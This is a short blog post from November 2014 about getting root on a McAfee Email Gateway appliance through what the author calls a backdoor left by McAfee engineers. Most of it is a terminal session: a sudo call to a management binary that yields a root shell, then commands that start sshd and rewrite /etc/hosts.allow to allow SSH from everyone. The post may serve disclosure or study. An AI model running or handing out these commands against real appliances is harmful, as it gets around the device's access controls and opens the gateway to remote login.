вторник, 11 ноября 2014 г.

getting super-user on a McAfee appliance

McAfee appliances, e.g. MEG (identifies itself as McAfee EGVA) doesn't give its users super-user rights. root user has password unknown.
But McAfee engineers have left a backdoor in the system. Take a look:
[admin@scmgateway ~]$ sudo /opt/NETAwss/mgmt/mash +x
[root@scmgateway admin]# service sshd start
Starting sshd:                                             [  OK  ]
[root@scmgateway admin]# sed -i 's/sshd : ALL : DENY/sshd : ALL : ALLOW/' /etc/hosts.allow
etc. etc.